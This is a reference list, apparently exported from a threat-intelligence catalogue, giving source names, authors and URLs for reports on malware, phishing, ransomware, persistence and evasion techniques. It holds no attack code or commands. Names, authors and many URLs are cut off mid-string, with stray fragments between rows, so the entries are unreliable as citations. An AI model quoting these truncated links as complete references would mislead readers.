Enigma PhisNelson, M.https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
OSX Malwar Sergei She https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
Analyzing Maynier, E.https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
Recorded FRecorded Fu https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
Lazarus APSaini, A. a https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-window
FinFisher eMicrosoft Dhttps://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeatin
Windows Pr odzhan. (20https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/
NtQueryInfMicrosoft. https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
Systemd ReAaron Kili. https://www.tecmint.com/control-systemd-services-on-remote-linux-server/
archlinux archlinux. https://wiki.archlinux.org/index.php/Systemd/Timers
gist Arch Catalin Cimhttps://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
Arch Linux Catalin Cimhttps://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repositor
acroread pEli Schwarthttps://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
Falcon SanHybrid Anahttps://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561
Linux man-Linux man-p http://man7.org/linux/man-pages/man1/systemd.1.html
phishing-k Brian Krebshttps://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
CISA RemotCISA. (n.d https://www.cisa.gov/uscert/ncas/alerts/aa23-025a
cyberproofItkin, Lior https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends
Unit42 LunKristopher https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/
sygnia Lun Oren Biderhttps://blog.sygnia.co/luna-moth-false-subscription-scams
ProofpointProofpoint.https://www.proofpoint.com/us/threat-reference/email-spoofing
Palo Alto UVicky Ray https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
Microsoft Microsoft. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625
Microsoft Microsoft. https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk
Microsoft Microsoft. https://msdn.microsoft.com/windows/desktop/ms524405
Microsoft Microsoft. https://msdn.microsoft.com/windows/desktop/ms644670
MsitPros Moe, O. (2 https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Kaspersky GReAT. (201 https://securelist.com/lazarus-under-the-hood/77908/
Trend MicrOliveira, A https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-d
Trend MicrOliveira, A https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-reso
Technet NeMicrosoft. https://technet.microsoft.com/bb490717.aspx
ORB MandiRaggi, Michhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
NGLite TroRobert Fal https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/
Onion RoutWikipedia. https://en.wikipedia.org/wiki/Onion_routing
TrendMicr Hacquebord, https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htm
Dragos CraJoe Slowik https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
Apple ZShelApple. (202https://support.apple.com/HT208050
DieNet Basdie.net. (n https://linux.die.net/man/1/bash
SensePost Stalmans, Ehttps://sensepost.com/blog/2017/outlook-forms-and-shells/
Analysis of Guillaumehttps://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis
chasing_a Hernandez,https://www.mandiant.com/resources/chasing-avaddon-ransomware
doppelpayHurley, S. https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/
avoslocke Lakshmanan https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html
dharma_raLoui, E. Sc https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniq
SCADAfencShaked, O. https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf
demystifyi Tran, T. ( https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-att
Sygnia Ele Sygnia Inc https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hst
Linux IPC N/A. (2021,https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20commu
Bitdefend Vrabie, V. https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT
Recorded FInsikt Grouhttps://www.recordedfuture.com/research/turla-apt-infrastructure
Kaspersky Global Resehttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-Project
Lua main pLua. (2024,https://www.lua.org/start.html
Lua state Lua. (n.d.) https://pgl.yoyo.org/luai/i/lua_State
Cyphort EvMarschalekhttps://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumen
PoetRat LuMercer, War https://blog.talosintelligence.com/poetrat-update/
Lua ProofpRaggi, Mic https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised
Summit Rou Piper, S.. https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/
Docker Sy Docker. (n.https://docs.docker.com/config/containers/start-containers-automatically/
GTFOBins GTFOBins. https://gtfobins.github.io/gtfobins/docker/
(
KubernetesKubernetes. https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/
Kubernete Kuberneteshttps://kubernetes.io/docs/concepts/workloads/controllers/daemonset/
AquaSec T Ofek Itach https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign
Podman SyValentin R https://www.redhat.com/sysadmin/podman-run-pods-systemd-services
TechNet CrMicrosoft. https://technet.microsoft.com/en-us/library/dn535501.aspx
Symantec ESecurity Rehttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
Fortinet AgZhang, X. ( https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
Nviso SpooDaman, R. https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/
Leitch Hol Leitch, J. https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
Mandiant EPena, E., E https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcod
Microsoft DMicrosoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-c
tau bundloErika Noer https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.htm
Resource aFlylib. (n. https://flylib.com/books/en/4.395.1.192/1/
ELC ExtendHoward Oakl https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/
sentinella Phil Stoke https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/
macOS HierTenon. (n.dhttp://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553
CarbonBlacCarbonBlack https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware
Unit42 LocHarbison, M https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
GitHub RevBohannon,https://github.com/danielbohannon/Revoke-Obfuscation
D
FireEye ObBohannon,https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06
D
FireEye Re Bohannon,https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf
D
GitHub OffCarr, N. (2 https://github.com/itsreallynick/office-crackros
Linux/CdorPierre-Marhttps://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-bl
PaloAlto White, J. https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcom
Russians E Cyber Securhttps://www.cisa.gov/uscert/ncas/alerts/aa22-074a
Mandiant Mandiant. https://www.mandiant.com/media/17826
Azure AD CMicrosoft. https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)
Microsoft IMicrosoft. https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)
IIS Backdo Julien. (20 https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdo
Trustwave Grunzweig,https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-i
Microsoft IMicrosoft. https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)
MMPC ISAPI MMPC. (2012 https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/
Microsoft Microsoft. https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview
ESET IIS M Hromcová,https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf
Unit 42 RGFalcone, R.https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-m
ThreatexprVest, J. (2 https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-
SingHealthCommitteehttps://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10
o
ShadowbunJohann Rehhttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
polymorphiBlackberry https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-m
polymorphiSentinelOnhttps://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
polymorphShellseekerhttps://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
polymorphiSherwin Akhttps://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-uni
AWS GetPaAmazon Web https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html
Jamf User Holland, J. https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines
Superuser Matutiae, M https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubunt
Microsoft Berk Veral.https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detec
amnesia mClaud Xiao,https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms
BackdoorinDaniel Grzehttps://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9
Varonis PoEric Saragahttps://www.varonis.com/blog/power-automate-data-exfiltration
anomali-linAnomali Thhttps://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
anomali-rocAnomali Thr https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficu
Linux manuArchWiki. (https://wiki.archlinux.org/index.php/Bash#Invocation
ScriptingO Armin Brieghttps://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
bencane blBenjamin Chttps://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little
macOS MSCedric
o Owehttps://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
Magento Cesar Anjoshttps://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
Tsunami Claud Xiao https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
PersistentJLeo Pitt. ( https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
code_persiLeo Pitt. ( https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
ESF_filemoPatrick Wahttps://objective-see.com/blog/blog_0x48.html
intezer-kaiPaul Litvak https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
Cylance ReCylance. (2https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf
GitHub HasDunning, J.https://github.com/hob0/hashjacking
Microsoft Microsoft. https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424
Osanda SteOsanda Mali https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
Didier Ste Stevens, D https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/
US-CERT APUS-CERT. (2https://www.us-cert.gov/ncas/alerts/TA17-293A
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx
Microsoft SMicrosoft. https://msdn.microsoft.com/library/ms679833.aspx
Microsoft Microsoft. https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-syste
Microsoft Microsoft. https://technet.microsoft.com/library/ee617241.aspx
AdSecurityMetcalf, S. https://adsecurity.org/?p=1772
Microsoft Microsoft. https://msdn.microsoft.com/library/ms677982.aspx
Kaspersky Vyacheslavhttps://securelist.com/lazarus-threatneedle/100803/
CarbonBlacBaskin, B. https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/
FireEye WaBerry, A., https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
Rhino S3 RGietzen, S. https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/
NHS DigitaNHS Digita https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary
US-CERT R US-CERT. ( https://www.us-cert.gov/ncas/alerts/TA16-091A
US-CERT NoUS-CERT. ( https://www.us-cert.gov/ncas/alerts/TA17-181A
US-CERT S US-CERT. ( https://www.us-cert.gov/ncas/alerts/AA18-337A
SpectorOpsGraeber, M. https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
AppleDocs Apple. (n.dhttps://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg
Carbon BlaCarbon Blahttps://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.h
Death by 10 Patrick Warhttps://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8
OSX ColdroPatrick Warhttps://objective-see.com/blog/blog_0x2A.html
ArsTechnica Goodin, D. https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-s
SANS DecryButler, M. http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840
SEI SSL Ins Dormann, W.https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html
FireEye Re Anubhav, Ahttps://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
LOLBAS ReLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
Microsoft Microsoft. https://support.microsoft.com/en-us/kb/249873
Carbon BlaNolen, R. ehttps://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-us
Pastebin E Ciarniello, https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-w
ProofpointProofpoint.https://www.proofpoint.com/us/threat-reference/vishing
Irongeek S Stephen Sim https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-pat
Bleeping CIonut Ilasc https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exp
Bleeping CLawrence Ab https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-po
Bleeping CSergiu Gatlhttps://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system
Elastic COMEwing, P. https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com
GDATA COM G DATA. (20 https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
Microsoft Microsoft. https://msdn.microsoft.com/library/ms694363.aspx
Bleeping CBill Toulas https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-
Bleeping CFlare. (202 https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-i
Okta Scatt Okta. (2022https://sec.okta.com/scatterswine
SecureWork SecureWork https://www.secureworks.com/research/the-growing-threat-from-infostealers
F-Secure CF-Secure Lahttps://www.f-secure.com/documents/996508/1030745/CozyDuke
ClearSky L ClearSky C https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf
GCPBucketSpencer Giehttps://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/
S3Recon GTravis Clar https://github.com/clarketm/s3recon
BlackBastaAntonio Cohttps://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-ti
SensePost Stalmans, https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
Dropbox MDavid Talb https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malwar
Windows Pr absolomb. https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
(
Windows UHackHappy.https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/
Help elimi Mark Baggehttps://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-ser
Startup It Apple. (201https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Ch
Malware SPierre-Marhttps://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/
CrowdStrikHanel, A. https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomwar
Darkside Cybereasonhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware
Securelist Fedor Sini https://securelist.com/evolution-of-jsworm-ransomware/102428/
SecureList Ivanov, A. https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
Microsoft Microsoft. http://support.microsoft.com/KB/170292
Wikipedia Wikipedia. http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Duqu
McAfee Mal Saavedra-Mo https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympic
CrowdstrikMatt Dahl. https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/
CiscoAngleNick Biasinhttps://blogs.cisco.com/security/talos/angler-domain-shadowing
ProofpointProofpointhttps://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows
Malleable-Chris Navarhttps://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
ESET Okrum Hromcova,https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Windows_Registry
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory
Ubuntu SS Ubuntu. (n.https://ubuntu.com/server/docs/service-sssd
MSDN RegsMicrosoft. https://msdn.microsoft.com/en-us/library/04za0hca.aspx
MSDN RegMicrosoft. https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx
LOLBAS RegLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
LOLBAS ReLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Regasm/
Operation botconf euhttps://www.youtube.com/watch?v=gchKFumYHWc
Kaspersky Onuma. (20https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/
objective- Patrick Wahttps://objective-see.com/blog/blog_0x26.html
Microsoft Russinovichhttps://docs.microsoft.com/sysinternals/downloads/sigcheck
Tripwire A Smith, T. https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/
Wikipedia RWikipedia. https://en.wikipedia.org/wiki/Root_certificate
Petri LogonDaniel Petrhttps://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-serv
FSISAC Fr FS-ISAC. (2https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pd
ArsTechnicaGoodin, D..https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-ti
FireEye OpNed Moran, https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-be
Symantec Wueest, C..https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-conti
ClearSky ClearSky C https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-
